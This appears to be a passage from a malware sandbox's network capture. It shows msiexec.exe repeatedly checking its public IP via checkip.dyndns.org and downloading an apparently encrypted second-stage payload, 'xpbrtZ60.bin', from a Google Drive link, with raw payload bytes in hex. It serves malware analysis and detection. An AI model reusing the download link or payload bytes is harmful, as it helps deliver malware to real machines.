                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Request-ID: 034266b8d5ffb8dff68c2d9d55c5cebc
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.1149990158.101.44.242801480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 17:09:19.424822092 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 17:09:20.918354988 CET321INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:20 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Request-ID: 019019424e1e87245554cff8cbc0b6d3
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.1149992158.101.44.242801480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 17:09:21.558166981 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 17:09:22.147300959 CET321INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:22 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Request-ID: 52bc4fef936095e06c956166feb493f4
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.1149994158.101.44.242801480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 17:09:22.753762007 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 17:09:24.728072882 CET321INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:24 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Request-ID: b69d30ef71f30819f4a2624e95772ac6
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.1149996158.101.44.242801480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 17:09:25.386934042 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 17:09:26.979806900 CET321INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:26 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Request-ID: 176947c8dcc9fb5a10b98c77913cf9e5
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.1149998158.101.44.242801480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 17:09:27.633630037 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 17:09:28.215542078 CET321INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:28 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Request-ID: b88fb116549aeaebccc08c52b69e5ae6
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.1149981142.250.186.784431480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 16:09:09 UTC216OUTGET /uc?export=download&id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                  Host: drive.google.com
                                                                                                                  Cache-Control: no-cache
                                                                                                                  2025-01-10 16:09:09 UTC1920INHTTP/1.1 303 See Other
                                                                                                                  Content-Type: application/binary
                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:09 GMT
                                                                                                                  Location: https://drive.usercontent.google.com/download?id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC&export=download
                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                  Content-Security-Policy: script-src 'nonce-6yD_f3XN8Wxe01TbppIAng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                  Server: ESF
                                                                                                                  Content-Length: 0
                                                                                                                  X-XSS-Protection: 0
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.1149982142.250.186.334431480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 16:09:10 UTC258OUTGET /download?id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC&export=download HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Host: drive.usercontent.google.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 16:09:12 UTC4936INHTTP/1.1 200 OK
                                                                                                                  X-GUploader-UploadID: AFiumC7XaE6UUsZ1TSPBOy2vvVCXpWuIYCx7MD3v-qmTBcpMjdK-ArMrHFqMseRtMQW5MkXd-fqVTRw
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Content-Disposition: attachment; filename="xpbrtZ60.bin"
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Length: 277056
                                                                                                                  Last-Modified: Tue, 24 Dec 2024 10:08:58 GMT
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:12 GMT
                                                                                                                  Expires: Fri, 10 Jan 2025 16:09:12 GMT
                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                  X-Goog-Hash: crc32c=2orCSA==
                                                                                                                  Server: UploadServer
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2025-01-10 16:09:12 UTC4936INData Raw: b7 e7 b5 22 9d 62 e2 2b 4b 90 57 d9 29 39 50 d0 cd b3 18 ec 01 ea 01 71 02 35 a4 6a 7c df f6 ce 44 54 f1 4e e5 b5 4c 4c c5 b3 6e 2e 6f 16 38 54 a9 9c 2a 0e 85 b8 65 fb df 22 38 30 7f 1c 13 09 c4 50 87 9d 42 34 56 04 7f 90 c7 02 f5 c4 dd 79 ca 96 99 4c 14 40 e2 78 0e e2 6e 28 38 65 dd 42 b4 7a 19 02 ce 2e 2a 95 97 af c0 29 0a 33 0a bb a1 8f e8 5c 49 77 0d 56 ab 05 93 eb 75 f7 44 ba eb e3 7d 95 5e 3c 95 15 65 b9 d6 cd 5d ad ef 49 84 37 b6 44 55 53 12 e3 57 81 ca 6e 32 09 8a dd 23 0b b0 56 93 41 60 54 58 59 b0 05 d1 fd 0c 11 67 11 64 90 35 a6 af d6 9d 8b 3d b2 9f 62 f3 b3 e8 c0 b7 a6 b4 1e 26 ba 57 63 9a 2f f6 71 23 17 f3 41 1a a2 22 8d d7 5e e9 0f 8b df c2 a7 bf 13 78 9c da f7 c9 88 53 fe 5a 34 b0 8c 59 24 a3 a5 99 66 70 4d ed 02 a5 ed 03 27 46 1d 72 47 1b
                                                                                                                  Data Ascii: "b+KW)9Pq5j|DTNLLn.o8T*e"80PB4VyL@xn(8eBz.*)3\IwVuD}^<e]I7DUSWn2#VA`TXYgd5=b&Wc/q#A"^xSZ4Y$fpM'FrG
                                                                                                                  2025-01-10 16:09:12 UTC4827INData Raw: b8 97 54 1d 15 35 25 8c 90 9f 86 24 7e f9 e2 25 07 c3 26 fe c9 70 98 71 e0 1a cc 2e c0 07 c6 0d e0 d4 bd b3 db 42 8e b4 3d 42 e9 b2 21 94 cb 21 49 a8 4a 93 21 a1 dd 85 c7 f8 f6 cf 5b 85 1b 69 b1 43 70 9d 8b a8 ba 0d f0 12 6c 4f d8 7f 06 8a 38 9a d7 01 fa b3 13 18 af 13 78 3b b8 25 51 7e 79 9e 59 2d 10 70 e5 e9 8a 43 ce c1 87 2d 90 f4 a0 cc 7a b6 5f 35 f3 51 04 82 55 be bf f3 7c 49 bb d3 be c2 89 32 f2 10 42 56 15 51 84 3f 34 ac a5 29 d5 32 51 f8 da 71 36 20 bd 29 5e b5 c5 8a c6 5f bd 44 5f b0 7b a6 95 c8 0d 05 9b 0a 24 d0 28 9b 26 77 08 16 73 db 42 5f 75 31 53 c7 32 a5 e6 54 4f 87 0a 06 9b 6d 3c 47 02 14 91 c7 02 00 3b 01 68 76 f9 f4 4c 14 4a ef a6 40 e2 7f 2d 14 6d cc 47 db 7b 19 02 c4 2e f6 4b 99 af d1 2d 26 3b 1b bf ce 8e e8 5c 43 77 d1 5f 83 6b 93 eb
                                                                                                                  Data Ascii: T5%$~%&pq.B=B!!IJ![iCplO8x;%Q~yY-pC-z_5QU|I2BVQ?4)2Qq6 )^_D_{$(&wsB_u1S2TOm<G;hvLJ@-mG{.K-&;\Cw_k
                                                                                                                  2025-01-10 16:09:12 UTC1322INData Raw: 0d 26 0e f0 74 db 66 31 d6 1f 0e da 62 f0 93 2f 5e 84 2e 28 d9 5c 98 9a c8 c8 2a 88 4d f4 15 72 7c b8 3a 18 b8 27 1f 2e 6a 2a 99 a5 61 5c e9 e4 58 3d 41 7e 4e 25 6c 99 b4 a5 c6 b8 59 34 4c b7 e4 79 7f 6f 52 df f3 88 74 e7 49 70 ab ca 09 43 d2 63 4d 3d e9 ef 15 f8 d9 fb 1e 7a ce 2c 03 cf 84 99 96 e0 a7 09 89 fd 3c ea 46 c1 06 7f c8 02 65 29 20 d5 30 75 09 95 2b 80 6e 66 1a d9 58 67 56 fb 3e 92 64 b6 a8 6d 9c c1 f9 d4 66 e1 b5 49 f9 4a d2 72 c0 e6 a1 40 24 c9 d5 c0 16 51 fc 6b aa 55 14 fd cf 34 80 1b 3b 44 85 4f 35 ea 8f 91 91 11 e1 b7 8a 09 ce 50 c0 45 d3 a8 1b e7 95 5a a3 fb 0e d3 db 6d 92 22 88 6c cb 30 3f 7a b4 71 da 37 0f 2f 89 8f 26 d6 7a fd f7 b0 0d f1 cf 2a e3 58 eb e5 33 d4 79 16 f9 ae 3c a1 eb 8a 51 9d 70 9d 8a 17 15 61 19 8c d1 d7 f5 ed 7c f9 e8
                                                                                                                  Data Ascii: &tf1b/^.(\*Mr|:'.j*a\X=A~N%lY4LyoRtIpCcM=z,<Fe) 0u+nfXgV>dmfIJr@$QkU4;DO5PEZm"l0?zq7/&z*X3y<Qpa|
                                                                                                                  2025-01-10 16:09:12 UTC1390INData Raw: 69 c2 f5 92 ad 5d bb 85 8a c7 24 aa eb 41 8a 83 e0 b5 36 3a 04 67 41 57 a9 f3 95 1f 23 7f a4 f4 a8 db 4c cc a8 db e9 1f 19 5c 65 09 ca 7f fb 42 7c 38 2c 96 23 35 be eb 81 c4 db b4 35 8c 17 b9 16 bb 05 8b 38 82 d5 6a ed 39 45 a6 d6 f4 f0 a6 d4 d3 40 ba 83 7f 49 83 09 39 2e 48 ab b1 4f 3c a3 1e de c9 82 26 19 18 4d 96 ae ab 4e 9d ca 0b 0f de 82 33 be 50 ed 6f f2 78 93 f6 dc b2 b9 2b 3a 9e 32 e9 7f 8d f7 7f a8 27 c9 33 cf 1b 94 dc 03 75 a7 15 f5 d2 41 06 29 87 42 33 4b c3 43 78 86 9b 96 af 2e 71 28 b4 46 86 13 63 ee 68 54 d7 59 b5 3a 2a 3b d8 64 06 9f 32 98 d4 fc 48 41 16 e1 97 dc 2e b4 96 c1 11 d3 5a 59 71 b2 8d 0e 48 60 28 5b 51 c3 09 ed 33 f5 fc f0 f1 b6 0e c4 76 ea 9e e0 06 4a 8c 9e 16 48 92 6b 4d 65 36 a1 05 e5 cc c8 57 f8 ce 03 70 8c 07 d7 a3 c0 4f 69
                                                                                                                  Data Ascii: i]$A6:gAW#L\eB|8,#558j9E@I9.HO<&MN3Pox+:2'3uA)B3KCx.q(FchTY:*;d2HA.ZYqH`([Q3vJHkMe6WpOi
                                                                                                                  2025-01-10 16:09:12 UTC1390INData Raw: 3c 15 ea 37 94 0d 11 9f 8e fc a0 ae ae 0a e9 2c 36 aa 70 b5 0d 83 d9 76 18 15 fe 50 73 47 09 18 2c dc 3e 3f 54 8a 67 82 60 e9 ae 25 1f de 66 46 13 07 58 e1 b9 62 e9 e7 d0 c3 e9 b7 ab d1 6c a8 9b e1 04 20 f1 98 07 4a 29 10 a5 15 ef c3 02 04 95 1e 89 45 97 d1 ca 99 bb 4b a8 a7 f6 75 9a a9 2b 8c 2f 67 91 34 f7 5e 44 7d df 2b 14 3b e6 5d 71 64 2b aa 69 d6 04 34 8d 11 df 45 0d d5 50 69 2d 8d c3 6e 0e 70 60 ad 43 16 46 d4 3d f2 44 ef a6 5c 3f d2 21 ff 2d 66 6e 90 2c 3a 09 36 03 26 ea 2e c0 22 b4 3d 71 7e 53 32 3c c8 b6 e1 24 52 82 1c 4a a0 c0 d2 be e1 72 f6 02 ff 34 60 2b ec 04 b9 b1 85 5d d1 22 f2 67 61 41 2d b6 25 29 c0 bb 3e a2 67 5f 7d 6b 75 76 ee e2 d3 d1 b5 6f 72 34 b4 44 b5 15 91 05 41 be 2e ae 86 ac 9b 12 8e 40 08 05 c8 64 68 f1 d8 86 6f 54 fa 36 c3 4a
                                                                                                                  Data Ascii: <7,6pvPsG,>?Tg`%fFXbl J)EKu+/g4^D}+;]qd+i4EPi-np`CF=D\?!-fn,:6&."=q~S2<$RJr4`+]"gaA-%)>g_}kuvor4DA.@dhoT6J
                                                                                                                  2025-01-10 16:09:12 UTC1390INData Raw: 9a 28 f5 51 97 d9 2e 78 cd 74 53 f2 b5 a7 8c 38 53 86 dc 4c 39 bb ed f3 b9 db 28 81 c3 52 0c a4 83 ab 16 b6 7b e8 7d 28 73 b2 c9 c3 37 ee 0e 48 df 42 47 e4 95 41 76 65 35 a2 e6 67 db 9a e6 94 ec 8c 48 16 6a 70 99 a3 0a 57 d6 b2 50 0d 1c f6 2a 29 7a 0a 3a 43 f9 76 24 93 4f 98 65 97 a2 2e b4 b5 69 30 56 5c 5a 3f 1b bf 09 37 86 66 83 74 b7 eb d8 f2 ab ac fe 3e 53 64 3f e1 c8 0c 4a fe 24 c3 b0 7a d2 47 f7 c5 6b 9a d8 41 8b cf fb 5b 47 6d 3f 47 d1 ed 48 67 09 d9 d2 de 47 fe 2c 47 7a 4e aa c0 16 09 a9 ce dc 5a 7b c3 1e d5 7f b4 21 50 2e 5a 44 b6 40 1a 79 e0 d9 3a d6 2d ff d3 7f 2c 90 4e af 7a b2 82 1b 2a b3 8d 6a 75 d7 62 ea f8 2e 47 96 b8 bf 20 d5 04 ae c0 65 17 28 81 75 0b 71 ac 27 7e a6 d9 49 24 72 6d 9f a4 ec ab 75 1a 61 4d 9d 68 f7 99 a7 c2 0d 14 ea f0 b8
                                                                                                                  Data Ascii: (Q.xtS8SL9(R{}(s7HBGAve5gHjpWP*)z:Cv$Oe.i0V\Z?7ft>Sd?J$zGkA[Gm?GHgG,GzNZ{!P.ZD@y:-,Nz*jub.G e(uq'~I$rmuaMh
                                                                                                                  2025-01-10 16:09:12 UTC1390INData Raw: 44 60 2f 2d b7 5d de ec 54 9b 9a 17 06 81 2e 9f 56 04 71 90 d6 18 65 91 dd 79 78 96 88 57 7b 9b e2 78 44 e2 6e 10 fb 65 dd 42 b4 7a 0f 2a b8 2e 2a 9f 97 8f c0 25 0a 33 22 cc a1 8f e2 5c 55 fa 4d 56 ab 04 b6 fd 87 51 4f ba 95 d4 86 9b 5e 8e 3e fd 53 7f 92 81 90 88 19 04 f5 36 7d 25 27 4c 5d d1 36 ec ec af 76 7e 9a f4 57 2b d6 91 96 29 67 2d 6a 30 ae 87 b0 a9 44 bc 4a 7e 00 f4 3e bd d0 45 a9 8b 4d 10 ba 75 db 07 b8 85 bd 04 dd 07 57 2b 9b e6 7a eb d3 68 0b a3 f3 41 10 00 e7 97 a7 2c f0 0e ab 7d ea f6 bb 13 72 2a f2 82 c9 88 59 ed 3a 05 6d 99 59 74 dd ba 99 06 70 65 a4 02 e5 e7 71 c0 54 1d 02 6d 59 07 1f a9 ab 3a 94 74 e8 e5 ff f6 6e 92 38 d4 1f 53 76 5e 57 7b c8 f5 92 1f 9f 61 9a 14 8e a2 02 44 96 d6 fb 09 ed f8 d0 c4 62 11 34 58 da f0 6c 24 11 e6 ee 12 90
                                                                                                                  Data Ascii: D`/-]T.VqeyxW{xDneBz*.*%3"\UMVQO^>S6}%'L]6v~W+)g-j0DJ~>EMuW+zhA,}r*Y:mYtpeqTmY:tn8Sv^W{aDb4Xl$
                                                                                                                  2025-01-10 16:09:12 UTC1390INData Raw: 3d a2 5f 94 9e ec 59 bc a8 b7 ff 07 f0 f8 6b e8 cb 40 8b d3 c8 72 6c 10 06 65 0c f7 a7 6f 0c 42 88 43 d9 37 14 f7 aa 2e e3 1d 31 44 94 47 28 19 fd 91 91 14 b6 34 fa 44 b1 46 98 66 f6 bf 39 45 6b 5b ba 5c 3a ce 90 c0 9f 22 f8 b0 c1 29 41 46 c6 02 ce 95 5a 23 d3 85 29 d6 00 49 2c aa 60 dd de 2c de ca cf f9 41 4d 62 e8 8f 31 14 d4 ed f9 9b f2 b8 97 a2 dc 15 1f 2f 8c a2 11 86 24 76 ea e5 34 5a bd 1c fe fe 75 eb b2 71 1b c6 41 0a 07 c6 07 e0 c5 ba dc 1c 42 8e be ee 7e e9 b2 3e fb 0d 21 81 a3 4a 82 28 d3 44 95 c7 88 de 7b 5b 85 11 1b 1f 53 70 ed 74 f2 ba 0d 22 7c ab 4f c8 75 06 9b 7a 87 5a 40 e1 83 11 3d 08 61 43 2d ab 55 f3 4a 6e b6 c5 4e 10 7a 4d c7 95 19 f3 ce 87 57 31 be e5 b2 42 bc 30 55 51 74 14 f0 63 a2 af 0e 81 6c a0 ac f1 a7 89 36 5a 35 59 23 3d 21 84
                                                                                                                  Data Ascii: =_Yk@rleoBC7.1DG(4DFf9Ek[\:")AFZ#)I,`,AMb1/$v4ZuqAB~>!J(D{[Spt"|OuzZ@=aC-UJnNzMW1B0UQtcl6Z5Y#=!
                                                                                                                  2025-01-10 16:09:12 UTC1390INData Raw: c5 5a 9f b5 c1 3d 13 7f 43 09 5d 8e 0e 38 c2 73 77 2f e3 0d 9f a2 55 d9 9c 95 d9 99 c4 06 42 a0 6b 07 59 a2 e0 6e 64 ce 7c d3 07 2d 2c 44 c0 da bb 3f e1 bc 2a c5 a9 60 5d 32 d7 67 d7 47 5b 40 de 26 ae cb ad 17 eb b2 5b 69 f9 48 32 db 36 1f 6b 5a c6 29 f3 c5 90 2f f0 d8 fb 74 72 b3 81 40 2d eb 75 d8 15 03 16 b7 c5 86 10 6e 59 ce 8d b8 c8 70 7b 03 74 30 ec a8 d3 bf ec 5a 58 fc 83 45 70 e3 df c7 c7 12 49 8c b9 2e 1e 9a e6 5c e4 b3 e6 1c 81 27 2c b4 b1 09 4a 73 bb ad ec 76 5f c3 89 08 fc e4 7b 0c e8 48 45 4a ef b7 ec d3 35 2f aa d5 d9 66 4b d3 32 8f f2 00 fa 85 db 82 c9 0d 39 fc 70 c4 87 3b ba 2a 88 48 a3 96 02 47 de 2c 40 9b 02 08 0c c8 d4 98 bc c5 68 f7 af fc 30 41 0e 92 2f 75 e7 88 d7 b5 ac fb 61 40 ed 54 7a 7f 15 e6 04 e9 e5 53 f6 4e 4d 39 ee 15 31 95 61
                                                                                                                  Data Ascii: Z=C]8sw/UBkYnd|-,D?*`]2gG[@&[iH26kZ)/tr@-unYp{t0ZXEpI.\',Jsv_{HEJ5/fK29p;*HG,@h0A/ua@TzSNM91a
